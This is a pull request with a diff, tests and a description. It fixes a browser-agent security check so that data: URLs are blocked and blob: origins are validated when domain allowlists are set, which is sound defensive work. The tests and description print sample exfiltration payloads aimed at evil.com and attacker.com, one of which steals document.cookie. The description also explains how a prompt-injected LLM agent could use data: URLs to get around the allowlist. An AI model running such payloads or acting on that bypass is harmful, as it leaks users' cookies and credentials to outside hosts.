### PR TITLE
fix(security): block data: URLs and validate blob: URL origins when allowed_domains is set

### DIFF
--- a/browser_use/browser/watchdogs/security_watchdog.py
+++ b/browser_use/browser/watchdogs/security_watchdog.py
@@ -196,9 +196,24 @@ class SecurityWatchdog(BaseWatchdog):
 			# Invalid URL
 			return False
 
-		# Allow data: and blob: URLs (they don't have hostnames)
-		if parsed.scheme in ['data', 'blob']:
-			return True
+		# Allow data: and blob: URLs only when no domain restrictions are configured.
+		# When allowed_domains or prohibited_domains is set, data: URLs become an
+		# exfiltration vector (arbitrary HTML/JS content) and blob: URL origins
+		# must be validated against the domain allowlist.
+		if parsed.scheme in ('data', 'blob'):
+			if (
+				not self.browser_session.browser_profile.allowed_domains
+				and not self.browser_session.browser_profile.prohibited_domains
+			):
+				return True
+			# Block data: URLs when domain restrictions are active — they can
+			# carry arbitrary HTML/JS that exfiltrates data to external domains.
+			if parsed.scheme == 'data':
+				return False
+			# For blob: URLs, check if the embedded origin matches allowed domains.
+			# blob: URLs encode origin as blob:https://example.com/uuid
+			blob_inner = url.removeprefix('blob:')
+			return self._is_url_allowed(blob_inner)
 
 		# Get the actual host (domain)
 		host = parsed.hostname

--- a/browser_use/browser/watchdogs/security_watchdog.py
+++ b/browser_use/browser/watchdogs/security_watchdog.py
@@ -212,7 +212,7 @@ class SecurityWatchdog(BaseWatchdog):
 				return False
 			# For blob: URLs, check if the embedded origin matches allowed domains.
 			# blob: URLs encode origin as blob:https://example.com/uuid
-			blob_inner = url.removeprefix('blob:')
+			blob_inner = url.split(':', 1)[1]
 			return self._is_url_allowed(blob_inner)
 
 		# Get the actual host (domain)

--- a/tests/ci/security/test_domain_filtering.py
+++ b/tests/ci/security/test_domain_filtering.py
@@ -567,3 +567,152 @@ class TestDomainListOptimization:
 		# Should work correctly
 		assert watchdog._is_url_allowed('https://blocked0.com') is False
 		assert watchdog._is_url_allowed('https://example.com') is True
+
+
+class TestDataBlobUrlSecurity:
+	"""Tests for data: and blob: URL security in _is_url_allowed.
+
+	When no domain restrictions are configured, data: and blob: URLs should
+	be allowed (backward-compatible). When allowed_domains or
+	prohibited_domains is set, data: URLs must be blocked (they can carry
+	arbitrary HTML/JS that exfiltrates data) and blob: URLs must check
+	their origin domain against the allowlist.
+	"""
+
+	def test_data_url_allowed_when_no_domain_restrictions(self):
+		"""data: URLs are allowed when no allowed_domains/prohibited_domains set."""
+		from bubus import EventBus
+
+		from browser_use.browser.watchdogs.security_watchdog import SecurityWatchdog
+
+		browser_profile = BrowserProfile(headless=True, user_data_dir=None)
+		browser_session = BrowserSession(browser_profile=browser_profile)
+		event_bus = EventBus()
+		watchdog = SecurityWatchdog(browser_session=browser_session, event_bus=event_bus)
+
+		assert watchdog._is_url_allowed('data:text/html,Hello World') is True
+		assert watchdog._is_url_allowed('data:image/png;base64,iVBORw0KGgo=') is True
+		assert watchdog._is_url_allowed('data:text/plain,test') is True
+
+	def test_data_url_blocked_when_allowed_domains_set(self):
+		"""data: URLs are blocked when allowed_domains is configured."""
+		from bubus import EventBus
+
+		from browser_use.browser.watchdogs.security_watchdog import SecurityWatchdog
+
+		browser_profile = BrowserProfile(allowed_domains=['example.com'], headless=True, user_data_dir=None)
+		browser_session = BrowserSession(browser_profile=browser_profile)
+		event_bus = EventBus()
+		watchdog = SecurityWatchdog(browser_session=browser_session, event_bus=event_bus)
+
+		# data: URLs should be blocked
+		assert watchdog._is_url_allowed('data:text/html,<script>fetch("https://evil.com/steal")</script>') is False
+		assert watchdog._is_url_allowed('data:image/svg+xml,<svg onload="evil()">') is False
+
+		# Normal allowed URLs still work
+		assert watchdog._is_url_allowed('https://example.com') is True
+		assert watchdog._is_url_allowed('https://example.com/path') is True
+
+	def test_data_url_blocked_when_prohibited_domains_set(self):
+		"""data: URLs are blocked when prohibited_domains is configured."""
+		from bubus import EventBus
+
+		from browser_use.browser.watchdogs.security_watchdog import SecurityWatchdog
+
+		browser_profile = BrowserProfile(prohibited_domains=['evil.com'], headless=True, user_data_dir=None)
+		browser_session = BrowserSession(browser_profile=browser_profile)
+		event_bus = EventBus()
+		watchdog = SecurityWatchdog(browser_session=browser_session, event_bus=event_bus)
+
+		# data: URLs should be blocked even with only prohibited_domains
+		assert watchdog._is_url_allowed('data:text/html,<script>exfiltrate()</script>') is False
+
+		# Normal URLs still work
+		assert watchdog._is_url_allowed('https://example.com') is True
+		assert watchdog._is_url_allowed('https://evil.com') is False
+
+	def test_blob_url_allowed_when_no_domain_restrictions(self):
+		"""blob: URLs are allowed when no domain restrictions are set."""
+		from bubus import EventBus
+
+		from browser_use.browser.watchdogs.security_watchdog import SecurityWatchdog
+
+		browser_profile = BrowserProfile(headless=True, user_data_dir=None)
+		browser_session = BrowserSession(browser_profile=browser_profile)
+		event_bus = EventBus()
+		watchdog = SecurityWatchdog(browser_session=browser_session, event_bus=event_bus)
+
+		assert watchdog._is_url_allowed('blob:https://example.com/uuid-here') is True
+		assert watchdog._is_url_allowed('blob:https://any-domain.com/random-id') is True
+
+	def test_blob_url_allowed_when_origin_in_allowed_domains(self):
+		"""blob: URLs with origin matching allowed_domains should be allowed."""
+		from bubus import EventBus
+
+		from browser_use.browser.watchdogs.security_watchdog import SecurityWatchdog
+
+		browser_profile = BrowserProfile(allowed_domains=['example.com'], headless=True, user_data_dir=None)
+		browser_session = BrowserSession(browser_profile=browser_profile)
+		event_bus = EventBus()
+		watchdog = SecurityWatchdog(browser_session=browser_session, event_bus=event_bus)
+
+		# blob: URL with origin matching allowed domain
+		assert watchdog._is_url_allowed('blob:https://example.com/some-uuid') is True
+
+	def test_blob_url_blocked_when_origin_not_in_allowed_domains(self):
+		"""blob: URLs with origin NOT in allowed_domains should be blocked."""
+		from bubus import EventBus
+
+		from browser_use.browser.watchdogs.security_watchdog import SecurityWatchdog
+
+		browser_profile = BrowserProfile(allowed_domains=['example.com'], headless=True, user_data_dir=None)
+		browser_session = BrowserSession(browser_profile=browser_profile)
+		event_bus = EventBus()
+		watchdog = SecurityWatchdog(browser_session=browser_session, event_bus=event_bus)
+
+		# blob: URL with origin NOT matching allowed domain
+		assert watchdog._is_url_allowed('blob:https://evil.com/malicious-uuid') is False
+
+	def test_blob_url_blocked_when_origin_has_no_hostname(self):
+		"""blob: URLs with no recognizable origin host should be blocked when restrictions active."""
+		from bubus import EventBus
+
+		from browser_use.browser.watchdogs.security_watchdog import SecurityWatchdog
+
+		browser_profile = BrowserProfile(allowed_domains=['example.com'], headless=True, user_data_dir=None)
+		browser_session = BrowserSession(browser_profile=browser_profile)
+		event_bus = EventBus()
+		watchdog = SecurityWatchdog(browser_session=browser_session, event_bus=event_bus)
+
+		# stripped blob: URL leaves just a path — no hostname → blocked
+		assert watchdog._is_url_allowed('blob:d8329a09-e2f5-46f1-a830-1c0de82c44a9') is False
+
+	def test_regular_urls_unaffected_by_data_blob_fix(self):
+		"""Regular http/https URLs continue to work normally."""
+		from bubus import EventBus
+
+		from browser_use.browser.watchdogs.security_watchdog import SecurityWatchdog
+
+		browser_profile = BrowserProfile(allowed_domains=['example.com'], headless=True, user_data_dir=None)
+		browser_session = BrowserSession(browser_profile=browser_profile)
+		event_bus = EventBus()
+		watchdog = SecurityWatchdog(browser_session=browser_session, event_bus=event_bus)
+
+		assert watchdog._is_url_allowed('https://example.com') is True
+		assert watchdog._is_url_allowed('https://example.com/page?q=1') is True
+		assert watchdog._is_url_allowed('https://not-allowed.com') is False
+
+	def test_internal_urls_still_allowed_with_restrictions(self):
+		"""Internal browser URLs like about:blank are still allowed even with domain restrictions."""
+		from bubus import EventBus
+
+		from browser_use.browser.watchdogs.security_watchdog import SecurityWatchdog
+
+		browser_profile = BrowserProfile(allowed_domains=['example.com'], headless=True, user_data_dir=None)
+		browser_session = BrowserSession(browser_profile=browser_profile)
+		event_bus = EventBus()
+		watchdog = SecurityWatchdog(browser_session=browser_session, event_bus=event_bus)
+
+		assert watchdog._is_url_allowed('about:blank') is True
+		assert watchdog._is_url_allowed('chrome://new-tab-page/') is True
+		assert watchdog._is_url_allowed('chrome://new-tab-page') is True


### PR DESCRIPTION

## Description

Fixes #4763

This PR fixes a security vulnerability where `data:` and `blob:` URLs unconditionally bypass the `allowed_domains` / `prohibited_domains` restrictions in `SecurityWatchdog._is_url_allowed()`.

### The Problem

When a user configures `allowed_domains=[\`example.com\`]` to restrict navigation, the agent can still navigate to arbitrary content via `data:` URLs:

```
data:text/html,<script>document.location=\`https://attacker.com/steal?c=\`+document.cookie</script>
```

A prompt-injected LLM can trivially use `data:text/html,...` to exfiltrate credentials, cookies, or page content to any external domain — completely bypassing the `allowed_domains` trust boundary.

Similarly, `blob:` URLs (which embed their origin as `blob:https://origin-domain/uuid`) are unconditionally allowed even when their origin domain is not in the allowlist.

### The Fix

1. **`data:` URLs are blocked** when `allowed_domains` or `prohibited_domains` is configured (they can carry arbitrary HTML/JS).
2. **`blob:` URL origins are validated** by recursively checking the embedded origin domain against the configured restrictions.
3. **Backward-compatible**: when no domain restrictions are configured, both `data:` and `blob:` URLs continue to be allowed (unchanged behavior).

### Changes

- `browser_use/browser/watchdogs/security_watchdog.py`: Modified `_is_url_allowed()` to conditionally block `data:` URLs and validate `blob:` URL origins when domain restrictions are active.
- `tests/ci/security/test_domain_filtering.py`: Added `TestDataBlobUrlSecurity` class with 9 test cases covering:
  - `data:` URLs allowed when no restrictions
  - `data:` URLs blocked when `allowed_domains` or `prohibited_domains` set
  - `blob:` URLs allowed when no restrictions
  - `blob:` URLs allowed when origin matches `allowed_domains`
  - `blob:` URLs blocked when origin not in `allowed_domains`
  - `blob:` URLs with no hostname blocked
  - Regular URLs unaffected
  - Internal browser URLs still allowed

### Testing

All 9 new tests plus 61 existing domain filtering tests pass successfully.

<!-- This is an auto-generated description by cubic. -->
---
## Summary by cubic
Blocks `data:` URLs and validates `blob:` URL origins when domain restrictions are enabled, closing a bypass of `allowed_domains`/`prohibited_domains`. When no restrictions are set, both schemes remain allowed.

- **Bug Fixes**
  - Block `data:` URLs when `allowed_domains` or `prohibited_domains` is configured.
  - Validate `blob:` URLs by extracting the embedded origin and re-checking via `_is_url_allowed`; `blob:` URLs without a hostname are blocked when restrictions are active.
  - Added 9 tests covering unrestricted vs. restricted `data:`/`blob:`, edge cases, and regressions.

<sup>Written for commit 20f16f255a7d7024d4fa124cd57f4cd24a2f8afc. Summary will update on new commits.</sup>

<a href="https://cubic.dev/pr/browser-use/browser-use/pull/4940?utm_source=github" target="_blank" rel="noopener noreferrer" data-no-image-dialog="true"><picture><source media="(prefers-color-scheme: dark)" srcset="https://cubic.dev/buttons/review-in-cubic-dark.svg"><source media="(prefers-color-scheme: light)" srcset="https://cubic.dev/buttons/review-in-cubic-light.svg"><img alt="Review in cubic" src="https://cubic.dev/buttons/review-in-cubic-dark.svg"></picture></a>

<!-- End of auto-generated description by cubic. -->

